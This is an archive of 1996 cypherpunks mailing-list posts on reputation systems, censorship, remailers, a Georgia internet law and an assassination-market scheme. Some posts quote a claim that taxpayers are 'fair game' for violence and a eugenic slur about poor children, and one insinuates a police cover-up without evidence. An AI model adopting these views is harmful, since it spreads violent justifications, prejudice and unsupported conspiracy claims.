At 06:15 AM 9/24/96 -0700, Sandy Sandfort wrote:

>C'punks,
>Time for another informal poll.
>
>On Mon, 23 Sep 1996, John Anonymous MacDonald wrote:
>> What a joy to make a public mockery of Tim Mayo!
>
>Do list members think Anonymous' posts make a public mockery of
>Tim May or Anonymous?  Let me know whose reputation you think 
>is enhanced or tarnished by these posts.  I'll post a summary to 
>the list in a week or two.  

First, to answer your question, I think the posts tarnish the
reputation of Anonymous, although there never was much
reputation to begin with.  I am of the opinion that a positive 
reputation is earned, not given, and arguing over the matter
at hand certainly doesn't help build a positive reputation.

Since these annoying posts started a week or so ago, I have
(for the first time ever) begun killfiling people and messages
on the cp list.  Right now I am killing all messages from 
John Anonymous MacDonald, Dmitri Vulis, and any message
in the "daily ... regarding TCM" thread(s).  I hope this madness
can end, so we can get back to more normal traffic levels on the
list.

If anything good can come of this, it's that more people (myself
included) will begin to use filtering tools to improve the perceived 
S/N ratio of the list.  I am working on making a Eudora Pro
plugin that creates and maintains a reputation system, which can 
then be tailored to modify incoming mail as desired, removing
irrelevant paragraphs, summarizing, all kinds of things.  Initially
it will just keep an index score for each user representing the
quality of the content which they author, but I have lots of things
I hope to add to it.

Good luck with the survey,

Jeremy

---
  Jeremy L. Mineweaser   | GCS/E d->-- s:- a--- C++(+++)$ ULC++(++++)>$ P+>++$
gt4436c@prism.gatech.edu | L+>++ E-(---)  W++ N+  !o-- K+>++  w+(++++) O-  M--
                         | V-(--) PS+(--) PE++ Y++>$ PGP++>+++$ t+() 5 X+ R+()
    *ai*vr*vx*crypto*    | tv(+)  b++>+++ DI+(++)  D+  G++ e>+++  h-() r-@
!y- 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "D. Moeller" <moe-san@stadt.com>
Date: Wed, 25 Sep 1996 04:11:18 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Where to write crypto?
In-Reply-To: <3.0b19.32.19960923075911.00bd74d4@panix.com>
Message-ID: <3248059E.1974@stadt.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell wrote:
> 
> One does not need a work permit to travel around Europe staying in various
> places and writing crypto.

Correct, inside EU.

> Work permits only apply to residents.

One does need a work-permit in Switzerland, since Switzerland is not EU
and everybody from an outside country needs one.

Cheers Moe!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 25 Sep 1996 16:21:02 +0800
To: trei@process.com
Subject: Re: More proposals for European censorship
In-Reply-To: <199609231442.HAA20480@toad.com>
Message-ID: <32488744.51AA@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei wrote:
> Asgaard writes:
> > On Thu, 19 Sep 1996, E. Allen Smith forwarded:
> > >> STRASBOURG, France (Sep 19, 1996 11:24 a.m. EDT) - The European
> > >> Parliament pressed the European Union on Thursday to act to curb 
> > >> child sex and trafficking rings, saying the fight against sexual 
> > >> abuse of children must be an "absolute priority."

> > It's probably no coincidence that the recently busted, utter 
> > horrible
> > child-molesting ring, with obvious protection from various persons
> > in the establishment, was centered in Belgium - that's where the EU
> > bureaucrat nomenklatura play their power games and go to bordellos.

> What exactly are you suggesting when you say 'it's probably no
> coincidence?" I can't quite figure it out.

"I can't quite figure it out" - says a lot right there.

> [While I've not been following the case in detail, it involves a ring
> of criminals in Belgium who kidnapped children to use them in
> child pornography. At least two little girls were starved to death
> when they're usefullness was over.]
> Are you suggesting that someone specifically set up a ring of
> child pornographers/murders in Belgium, then let it get caught, in
> an attempt to influence the EU parliment?
> Or are you suggesting that this particular gang of sub-humans was
> exposed at this time in an attempt to influence policy, implying that
> the Belgian LEAs knew about, but did not stop the ring until they
> needed a publicity coup?
> I find such notions utterly beyond rationality.

Per that comment about rationality: That LEA's knew about the ring, or 
that they would participate in a scam of some kind?

> Do you expect we're going to see a statement from some Belgian
> police investigator to the effect of "Yes, I  knew they were raping
> and killing children, but was told to do nothing, and I obeyed."?

Any statement that is consistent with developments in this case, and 
other similar cases, most likely.

> There is a tendency of many on this list to demonize those we
> disagree with. If a person or group takes the 'wrong' stance on
> cryptography, key "escrow", etc, many list members will act as
> if that person or group were capable of any atrocity, and is acting
> out of the very worst of motives and hidden agendas.
> Such an attitude is common, but not desirable in the modern world.
> It served some purpose when war involved the literal massacre of
> one's opponents - it's easier to commit genocide against the tribe
> over the ridge if you demonize them into not-quite-humans, but in
> the modern world this is not a rational option.

You should know that "many on this list" bears no relation to the LEA's 
mentioned above.  People on this list have relatively small agendas, in 
money terms, whereas the LEA's are servicing people with Big Money.

> While it's possible to  regard many policies of governments,
> ill-informed, self-serving, populist, and wrong, to act as if there is 
> no significant differences between real democracies and the worst
> authoritarian dictatorships is absurd.

Please list any "real democracies". Thanks a bunch.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 25 Sep 1996 09:17:02 +0800
To: cypherpunks@toad.com
Subject: Re: Barlow/Taylor censorship debate
In-Reply-To: <v02140b0fae6ca0cd3b6d@[204.62.132.248]>
Message-ID: <v03007805ae6e0f480157@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:23 pm -0400 9/23/96, Roderick Simpson wrote:
> Bruce Taylor, over

I *really* wish people would use his *whole* name, so we don't confuse him
with the other Bruce Taylors on the net.

His whole name is: Bruce "Penis With a Blister On It" Taylor.

Since that's the phrase he kept repeating over and over at CFP96, it *must*
be his middle name...

I'll save the joke about lawyers and neckties for another occasion. ;-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott Guthery" <guthery@snailbox.com>
Date: Wed, 25 Sep 1996 11:07:35 +0800
To: <cypherpunks@toad.com>
Subject: Tamper-Resistant Software from INTEL
Message-ID: <199609242330.SAA16789@oak.zilker.net>
MIME-Version: 1.0
Content-Type: text/plain


Has anybody heard of tamper-resistant software in general or a method
for tamper-resistant software from Intel in particular?

-*-*-*-*-*-*-*- http://www.snailbox.com -*-*-*-*-*-*-*-
Scott Guthery                Home:  1 512 266 1278
The SnailBox                 Work:  1 512 331 3774    
12417 River Bend #6          FAX:   1 512 331 3059
Austin, Texas 78732          Email: guthery@snailbox.com 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 25 Sep 1996 19:59:53 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
In-Reply-To: <Pine.SUN.3.91.960923194435.15255A-100000@crl2.crl.com>
Message-ID: <32488A8F.6FF2@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort wrote:
> C'punks,
> On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote:
> > There is no such thing as an "ordinary citizen". When the U.S.
> > commits war crimes in Korea, Viet Nam, Grenada, Panama, Somalia, 
> > Iraq, and elsewhere,
> > every American taxpayer is an accomplice and a fair game.

> Illogical collectivist claptrap.  When a taxpayer is targeted by
> terrorists, he has been victimized twice--first by the government
> that stole his money, second by the terrorist that punished him
> for the (alleged) acts others commited with that money.  If a
> mugger buys a gun with the money he took from me, am I then
> responsible for the murder he commits with it?  Clearly not.
> This line of "reasoning" is nothing more than a sad variant of
> the old, "blame the victim" game.  For shame.
> Let's bring this back to crypto for a moment.  Dimitri's "logic"
> must necessarily lead one to the conclusion that Cypherpunks (at
> least those in the US) are responsible for whatever draconian
> restrictions "our" government puts on free speech, crypto or
> whatever.  John Gilmore, Philip Zimmermann, Whit Diffie and
> others will be chagrined to learn this, I'm sure.
> Dimitri needs to learn what it means to be an adult.  Everyone is
> totally responsible for what they do, but ONLY for what THEY do.
> No one is responsible for the unassisted, willful acts of others.

You are committing a logical fallacy with the above. You're saying that 
the mugger who commits the crime with a stolen gun is equivalent to my 
own hired hitmen (the local and federal police I pay so dearly for).

This is obviously not the case.  I didn't hire the mugger, nor did I 
encourage the thief in an overt way.  But I did consciously select and 
pay for the police and govt. assassins.  And so did you.  Unless you're 
saying that the govt. forcibly takes you down to the voting booth, etc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 25 Sep 1996 21:27:49 +0800
To: cypherpunks@toad.com
Subject: Re: Not reputation again! (Was: The Nature of the Cypherpunks List)
Message-ID: <ae6e375801021004b001@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:45 AM 9/25/96, Greg Burk wrote:

>I know, I said I was through arguing "reputation theory" and I really
>thought I was, but this latest impelled me to say more.
>
>tcmay@got.net (Timothy C. May) writes:
>> --Tim May, whose reputation is, like the list, whatever it is, for whatever
>> reasons, and who thus needs no defenders
>
>Indeed, your reputation needs no defenders among those of us who know
>you directly (if electronically)
>
>But here's something for you to think over: If there are such things as
>negative reputations, why hasn't your reputation zoomed to godlike
>status upon the ... let us say unreserved... condemnations of the
>Poster With Nothing Better To Do, if s/he has a negative reputation (I
>presume you would say so)

First off, I certainly don't know what the precise "calculus of
reputations" looks like. That is, how it adds, subtracts, how the reps of
others factor in, etc.

I think studying how it might work--and how it compares to other fields,
such as movie reviews, music reviews, book reviews, etc.--might be an
excellent Masters-level thesis for someone in sociology or even CS (if done
with the proper slant).

However, I would never think the calculus is something so simplistic as: "I
rate Alice's reputation as very negative. Alice just said some bad things
about Bob. Therefore, Bob's reputation will go up a great deal."

More likely, something like: "Alice just said a bunch of things bad about
Bob. Cool. Maybe this Bob person deserves a look."

In other words, smaller steps, with diminishing returns. And with few
sudden movements, except by direct judgment.

>Or you could contend that there's no such thing as collective
>reputation, but I think there are two major flaws: His/her 1-to-1
>"reputations" clearly add up to a collective consensus among us annoyed
>cpunk readers. Even if you contend that reputations in general do not
>behave collectively, it is no defense in this case at least. And I think
>if "reputation theory" predicts no collective behavior, it must be
>pretty weak.

I believe that, to first order, reputation is a tensor. Given N people,
imagine this matrix:

            Alice  Bob   Charles  Daphne  Earl  Fiona  Gloria  Harold

Alice       .99    -.21    .75     .94    .94    .83    -.03    .22

Bob         .72     .96   -.02     .85    .71   -.60     .10    .32

Charles     .82     .02    .97     .90   -.50    .42    -.10    .70

Daphne      .45     .87    .23     .92    .74    .87     .11    .23

Earl        .89     .54    .34     .90    .95    .23     .23    .46

Fiona       .87     .50    .32     .68   -.34    .97     .78   -.15

Gloria      .59     .78   -.23     .15    .29   -.30    -.80    .51

Harold      .65     .03    .34     .78    .51   -.76    -.51    .97


This can be read thusly: Alice has a .99 rating of her own self, a negative
.21 rating of Bob (or Bob's opinions, or his posts, or whatever is being
rated), and so on. Bob has a .72 rating of Alice, a .96 rating of himself,
etc. "Alice(Bob) = -.21"

Now in this example I made up, some various observations can be made.
Nearly everyone rates Harold pretty low, except for Harold. Thus, Harold's
own opinions of others, if expressed, probably won't change too many other
opinions.

Nearly everyone rates Daphne very highly, and her opinions are read
carefully. However, Gloria does not rate Daphne highly...but then Gloria
rates her own stuff a negative .80, so Gloria has some psychological issues
to deal with and others typically rate her pretty low.

And so on.

In the real world, I think we can see how such a matrix could be
constructed, based on either direct inputs (votes) from people, or based on
their apparently positive or negative comments, etc. (For example, it is
fairly obvious that I might give Hal Finney a rating of .90, and Vulis a
-.90. And so on, for others.)

Now is there a "collective reputation"? There are various additive
properties, with easily understandable meanings. (If Harold is in a lot of
kill files, this says a lot, for example.)

Anyway, as I said before, the "calculus of reputations" is not worked out,
so far as I know. Some weeks back I suggested that the mathematics of
belief as developed in "Dempster-Shafer belief theory" has some nice
properties that make it seem a promising area to look into.


....
>Because s/he can *never spend reputation down to zero*.

So you say. I see no reason reputations cannot be negative, in the sense
that not only do I take the opinions of such a person very seriously, I
tend in fact to believe the opposite opinion is more likely. This is a
"negative " reputation. Thus, a reputation can be "spent down" to zero, and
below.

>Frankly, I think you should just admit that your reputation theory is
>flawed and rethink it. I would be interested in hearing it, but what you
>have now is IMHO badly flawed.


--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 25 Sep 1996 13:53:01 +0800
To: cypherpunks@toad.com
Subject: The Netsurfer of Penzance
Message-ID: <v0300781bae6e18d940b8@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Priority: normal
Date:         Tue, 24 Sep 1996 10:31:58 PST
Reply-To: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
Sender: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
From: Eugene Volokh <VOLOKH@LAW.UCLA.EDU>
Organization: UCLA School of Law
Subject:      The Netsurfer of Penzance
To: CYBERIA-L@LISTSERV.AOL.COM

------- Forwarded Message Follows -------

From: "Thomas P. Vogl" <tvogl@wo.erim.org>

The Newbie's Song (Based on the Major General's song from
"The Pirates of Penzance", Gilbert & Sullivan).

I am the very model of a Usenet individual,
I've information meaningless and ultimately trivial,
I know the basic elements of alien biology,
And all the hidden secrets of the Church of Scientology,
I've seen "The Wrath of Khan" and every Star Trek film that followed it,
I moan about my Servicecard and how the cash till swallowed it,
About the laws on handguns I am sending off a counterblast,
With many cheerful facts about the way you can MAKE MONEY FAST!

ALL:       With many cheerful etc.

I'll tell you why the Japanese are taking over Panama,
And why the USA is still a better place than Canada,
In short, in matters meaningless and ultimately trivial,
I am the very model of a Usenet individual.

ALL:      In short, in matters meaningless and ultimately trivial,
          He is the very model of a Usenet individual.

I post in alt.revisionism lies about the Holocaust,
I cut my .sig to twenty lines, I didn't want to, I was forced,
I really can't believe the "Good Times" virus to be mythical,
And Clinton's raising taxes which is, frankly, bloody typical,
I've upset several people on alt.flame, I really don't know how,
And sent a thousand business cards to Mr. and Mrs. Shergold now,
I have a very poor grip of political geography,
And absolutely no involvement (yet!) in child pornography,

ALL:      And absolutely no, etc.

I've paid two-fifty dollars for the Nieman-Marcus recipe,
And told the Spanish tourist's tale about the toothbrush pessary,
In short, in matters meaningless and ultimately trivial,
I am the very model of a Usenet individual.

ALL:      In short, in matters meaningless and ultimately trivial,
          He is the very model of a Usenet individual.

In fact, when I know what is meant by "binary" and "FTP",
When I know how to decode porno JPEGs from a .uue,
When I can handle HTML, Telnet, mail and IRC,
And when I know the words initialized to form "http",
When I have learnt what topics are acceptable in talk.bizarre,
When I know more of Usenet than the tailpipe of a motor-car,
In short, when I've a smattering of elementary netiquette,
You'll say a better individual has never surfed the Net.

ALL:      You'll say a better individual, etc.

For my technical experience, although I claim to know it all
Could barely serve to run the installation disk from AOL;
But still, in matters meaningless and ultimately trivial,
I am the very model of a Usenet individual.

ALL:      But still, in matters meaningless and ultimately trivial,
          He is the very model of a Usenet individual.

-----------------------------------------------------------------

Harry Erwin, Internet: herwin@gmu.edu, Web Page:
http://osf1.gmu.edu/~herwin 49 year old PhD student in
computational neuroscience ("how bats do it" 8)  and
lecturer for CS 211 (data structures and advanced C++)






                               -- Eugene Volokh, UCLA Law

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 25 Sep 1996 14:02:22 +0800
To: cypherpunks@toad.com
Subject: Lexis and Privacy - Bill approaches.
Message-ID: <Pine.SUN.3.94.960924190706.9902A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



Pressure from the FTC Which fielded hundreds of complaints about Lexis and
the social security number scrap) has prompted members of the Banking
Committee to add provisions to the most recent spending bills which
protect personal information (including social security numbers, phone
numbers, addresses, and so forth) under the Fair Credit Reporting Act.
This limits access to this information to credit agencies and otherwise
authorized entities.  (Of which I assume Lexis is not one).

It's not great protection, but it's something.

I urge everyone to take their own measures to protect personal data
regardless of what some piece of paper on a library shelf says is
protected.  The only real protection is not to allow release of the data
in the first place.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Wed, 25 Sep 1996 06:12:10 +0800
To: cypherpunks@toad.com
Subject: (non-)repudiation, AP, Hallam and me
Message-ID: <199609241720.TAA08077@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I don't have the time or interest to read and write about Bell's
evil kook daydreams or Baker's contorted statist 
rationalizations.


Feel free to write any misrepresentations about me (in general 
or in specific) that you like.  I'm sure in the long run it will
do more harm to you than to me.


For what it is worth, I long ago warned that cpunks needed to
distance themselves from Bell in the public's eye.  Nowadays 
I don't really care what the public thinks of cpunks.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMkgYVEjbHy8sKZitAQHbpwL/XQfN72HBoOBmqodwD2WaAD4DBY6CP1zm
VphitY08frCZcz/okbVlQx8Jzs68rDzkJAeGbYdeumYc5vixwkv0q0QCLTvluu+I
t8fTfIuraSzZS2gUlE9BMkNirEK+z5jA
=gnG0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 25 Sep 1996 07:27:45 +0800
To: cypherpunks@toad.com
Subject: ICI_96x
Message-ID: <199609241940.TAA09129@pipe1.ny1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


A fax appeared of the International Cryptography Institute, 1996, October
25-26, in DC. 
 
 
Here are excerpts: 
 
   _________________________________________________________ 
 
   What are the different national policies and regulations 
   governing cryptography and how might these evolve? 
 
   What cryptography technologies are on the market in  
   different countries, what is being used, and for what  
   purpose? 
 
   What problems is cryptography causing law enforcement? 
 
   What are the requirements of business and other 
   organizations? 
 
   What are the new trends in cryptography and what will be 
   their impact on society? 
 
   What efforts are leading toward an international 
   cryptography framework? 
 
   _________________________________________________________ 
 
   Sample sessions: 
 
   The International Cryptography Experiment 
 
   Export controls on Encryption Software 
 
   Cryptography: Recent Developments in the EU 
 
   Towards an Australian Policy on Encryption 
 
   New Russian Encryption Policies and Regulations 
 
   International Regulation of Cryptography: Update 
 
   U.S. Government Cryptography Policy 
 
   Law Enforcement Requirements for Encryption 
 
   Transnational Key Escrow 
 
   Commercial and International Key Escrow 
 
   Digital Cash 
 
   _________________________________________________________ 
 
   Some of 38 "Invited Faculty" 
 
   Dr. Dorothy Denning, Georgetown University 
   Mr. John Droge, Mykotronix 
   Mr. Louis. J. Freeh, Director, FBI 
   Mr. Michael Gilmore, FBI 
   Mr. David Kahn, Author, NSA 
   Dr. Kwok-Yeo Lam, National University of Singapore 
   Dr. Anatoly N. Lebedev, LAN Crypto, Ltd. 
   Mr. Ronald Lee, General Counsel, NSA 
   Mr. Yves LeRoux, Digital Equipment 
   Mr. Nick Mansfield, Shell International Petroleum 
   Mr. Michael Nelson, White House Office STP 
   Dr. Jean-Jacques Quisquatier, University of Louvain 
   Mr. John Young, National Computer Board [Nope] 
 
   ----- 
 
   http://jya.com/ici96x.txt 
 
   ICI_96x




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Wed, 25 Sep 1996 13:21:59 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!]
In-Reply-To: <Pine.SUN.3.91.960924143919.28504B-100000@tipper.oit.unc.edu>
Message-ID: <Pine.SUN.3.91.960924192546.20796B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Libertarian philosophy is, however, sympathetic to vigilantism. True
libertarians might characterize AP-type schemes as allowing two forms of
action: just assassination (Hitler, Stalin) and unjust murder (most
everyone else). But reasonable libertarians will probably disagree where 
lines should be drawn.

-Declan


On Tue, 24 Sep 1996, Simon Spero wrote:

> On Tue, 24 Sep 1996, attila wrote:
> 
> > 
> >         go back to your beloved England and your labour unions
> 			your roots are showing :-) ----^
> 
> >         NO, I will not outright reject Jim Bell's "Assassination
> > Politics."
> 
> Assasination politics is  impossible to defend from a classical 
> Liberal/Libertarian position. Bell advocates arbitrary applications of 
> violence and coercion without restriction. There is no way to justify the 
> initiation of force without abandoning any pretence of being a 
> Libertarian (which, to be fair, Bell doesn't claim to be).
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Garrett <teddygee@visi.net>
Date: Wed, 25 Sep 1996 11:21:52 +0800
To: Super User <info@interlink-bbs.com>
Subject: Re: Anonymous remailer information <unsolcitied NOISE>
In-Reply-To: <199609240502.AAA14766@radish.interlink-bbs.com>
Message-ID: <Pine.LNX.3.91.960924192212.582A-100000@tgrafix.livesys.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 24 Sep 1996, Super User wrote:

> Hello!
> 
> Thank you for your interest in our anonymous service. We
> believe our remailer to be the best on the 'Net.

Wasn't aware I'd asked for any information regarding your 'anonymous'
service.  Whether you believe it to be the best on the net or not, I was 
completely unaware of it's existence.

> The service costs $5.00 a month and will allow you to send
> mail anywhere on the internet with a false ("spoofed") return
> address. THIS IS INTENDED FOR ENTERTAINMENT PURPOSES ONLY!

Hmm...  I've heard of remailers being run for legitimate reasons like
protecting freedom of speech, allowing a means to disseminate information
anonymously, and simply protecting the identity of the person sending the
message, but never for ENTERTAINMENT PURPOSES ONLY...

> Q: How does the service work?

Ok, I'll bite..
 
> A: You simply send your letter to anon@interlink-bbs.com,
> following the format which we will detail when you
> subscribe, and your letter will be remailed with the new
> return address.

Don't I encrypt it first with the public key of your remailer?  Otherwise,
how can I instruct the mailer which next hops to make?  And since I'm 
sending all this in the clear to your remailer, don't I end up being open 
for a man in the middle attack, traffic analysis, and just plain anybody 
with a sniffer on my ISPs terminal servers.

> Q: Can I post to USENET with your remailer?
> A: Yes, if you use a gateway. We will provide complete
> instructions at your request (assuming you have an account).

Ah, so I can post the hundreds of kiddie porn pics I have through your
service and be moderately untraceable?

> Q: Can I send files?
> A: If you uuencode them first, yes.

Well, naturally.  Most mail systems on the internet have serious problems
digesting binary objects.  Oh, I guess you were expecting that I'd use 
the Microsoft Mailer...

> Q: May I test your service for free?
> A: No.

Yet another question I didn't ask.


> Q: Does anyone ever complain about receiving mail which
> has been forwarded from InterLink?
> A: Sometimes. What we do is we block the address of
> the complainer so that no more mail may be forwarded to
> that address.

Sounds like a plan.  Can I have my name removed from your unsolicited 
mailing list this way?  When I start running a remailer service, I think 
I'll adopt that strategy, if possible.  Of course, MY remailer will be a 
cypherpunks style remailer or a mixmaster.  And it'll be free, too.  Of 
course, people will need to know a little bit about crypto and privacy to 
use it...  but hey, ya gotta keep out the riff-raff somehow.

> Repeated complaints will result in your account being closed.
> This has not been a problem in the past, however, perhaps
> because no one knew to whom a complaint could be sent!

Or perhaps because no one in their right minds believes your remailer to 
be anonymous.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@ai.mit.edu
Date: Wed, 25 Sep 1996 11:25:49 +0800
To: cypherpunks@toad.com
Subject: Fruitcake Politics cont. [Noise]
Message-ID: <9609250011.AA24972@etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>You're wrong on at least three counts:  I absolutely do claim to be a 
>libertarian, for one.  

And Mr Dupont claims to be the Dalai Lama...

>Secondly, while I advocate a system which I call AP, 
>I do not "advocate" the MISUSE of that system for the act of attacking 
>people who have no initiated force or fraud.

In the diatribe you proceed to spew forth you define "fraud" as tax 
collection. In other words you are calling for the murder of the members
of the IRS. I don't consider your position to be distinguishable from 
that of the Oaklahoma city bombers.

Interestingly enough the paragraph that begins by claiming there are 
at least three points runs out of steam after only two. 

In fact it is not argued from a classical libertarian or liberal 
position as claimed. The classical liberal position is that there are 
no rights without law so AP is self contradictory. I consider the
authority of Rawls and Cohen on this one somewhat more persuasive
than Bell. Mills certainly argues from this position but I can't 
claim to have discussed it with Mills :-)

I don't think that Nozdic would accept the argument either. It is
entirely from false analogies. In law the right of self defense is
limited. You are not entitled to kill someone if you fear that they
might tread on your toe. The force used has to be both necessary and
commensurate. To argue that one is entitled to murder IRS agents
because you disagree with the legitimacy of taxes is certainly not
a liberal position.

It also wont do to disown the consequences of the scheme. Of course 
it would be the perfect scheme for getting rid of unwanted spouses
etc. Simply dismissing this as an "unfortunate" side effect is
not credible. Its like Teller's scheme to build a second panama
canal using A bombs, describing the radiation damage caused as
an unfortunate side effect. 



	Phill










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Wed, 25 Sep 1996 13:55:01 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Public Schools
Message-ID: <199609250325.UAA10747@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About: 24 Sep 96 at 14:16, Dr.Dimitri Vulis KOTM wrote:

> No, on the contrary, sending poor kids to good schools on scholarships
> does not improve their genes. They tend to become drug dealers.
> 

That just about does it for me.  This jerk is just trying to push 
everyone's buttons.  He is doing a beautiful job.  Fuckhead.

Ross




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 25 Sep 1996 14:03:20 +0800
To: Ravi Pandya <rpandya@netcom.com>
Subject: Re: Private Information Retrieval
In-Reply-To: <2.2.32.19960924222443.006964e8@netcom7.netcom.com>
Message-ID: <Pine.3.89.9609242021.A10305-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain





On Tue, 24 Sep 1996, Ravi Pandya wrote:

> ABSTRACT:
> 
> Publicly accessible databases are an indispensable resource for retrieving  
> up to date information. But they also pose a significant risk to the 
> privacy of the user, since a curious database operator can follow the user's 
> queries and infer what the user  is after.

Hmm. Sounds like job for KeyKOS :-)

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com
Date: Wed, 25 Sep 1996 12:24:28 +0800
To: cypherpunks@toad.com
Subject: [EFG] Fwd: Ga. Internet Law Challenged
Message-ID: <2.2.32.19960925010103.00679840@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


>X-Sender: smcclain@pop.atl.mindspring.com
>Date: Tue, 24 Sep 1996 16:47:07 -0400
>To: efg-action@ninja.techwood.org
>Reply-To: efg-action@ninja.techwood.org
>
>>From:	AOLNewsProfiles@aol.net
>>Date: 96-09-24 15:25:54 EDT
>>
>>.c The Associated Press
>>      ATLANTA (AP) -- The American Civil Liberties Union and computer
>>activists filed suit Tuesday challenging a new Georgia law they
>>contend restricts free speech in cyberspace.
>>      ``Fundamental civil liberties are as important in cyberspace as
>>they are in traditional contexts,'' said Ann Beeson, an ACLU
>>attorney who specializes in computer law.
>>      Plaintiffs in the suit filed in federal court also include state
>>Rep. Mitch Kaye, R-Marietta, who fought the law's passage, and
>>Electronic Frontiers Georgia, a computer liberties organization.
>>      The law took effect July 1. It bars computer users from falsely
>>identifying themselves, a provision which critics contend makes it
>>illegal to use pseudonyms in electronic messages sent by computer.
>>Some computer services allow users to send messages that identify
>>them only by a pseudonym or account number.
>>      The law also makes it a crime for someone to use a company's
>>trademark or symbol without permission. Critics argue that could
>>make criminals of Web page owners who have established links to
>>help users move quickly from their pages to those of corporate
>>America.
>>      Robert Costner of Electronic Frontiers Georgia said that aspect
>>of the law could subject his own group to penalties because its Web
>>page provides a link to BellSouth's page to assist computer users
>>in contacting the company about a recent rate increase.
>>      Rep. Don Parsons, R-Marietta, who steered the law to passage,
>>has said critics are overreacting.
>>      The law only makes it illegal for a person to misrepresent
>>himself on the network, posing as someone or something else, he
>>noted.
>>      ``If somebody uses that type of data, such as a trade name, to
>>identify themselves as some other organization, then they clearly
>>are seeking to defraud,'' Parsons said last spring.
>>      Gov. Zell Miller signed the bill April 18 despite a warning from
>>the attorney general that it was vague and a plea for a veto from
>>the San Francisco-based Electronic Frontier Foundation, which
>>called the measure an unconstitutional restraint on free speech
>>rights.
>>      Ms. Beeson said the suit appears to be the first legal challenge
>>in the country to an individual state's attempt to regulate the
>>Internet.
>>      ``If 50 states pass 50 contradictory laws, Internet users will
>>be virtually paralyzed for fear of violating one or more of those
>>laws,'' she said.
>>      AP-NY-09-24-96 1523EDT
>>      Copyright 1996 The Associated Press.  The information 
>>contained in the AP news report may not be published, 
>>broadcast, rewritten or otherwise distributed without 
>>prior written authority of The Associated Press.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Carl A. Wescott" <eyethink@cse.ucsc.edu>
Date: Wed, 25 Sep 1996 16:42:47 +0800
To: cypherpunks@toad.com
Subject: wanted: cryptographers and security consultants
Message-ID: <199609250408.VAA16237@arapaho.cse.ucsc.edu>
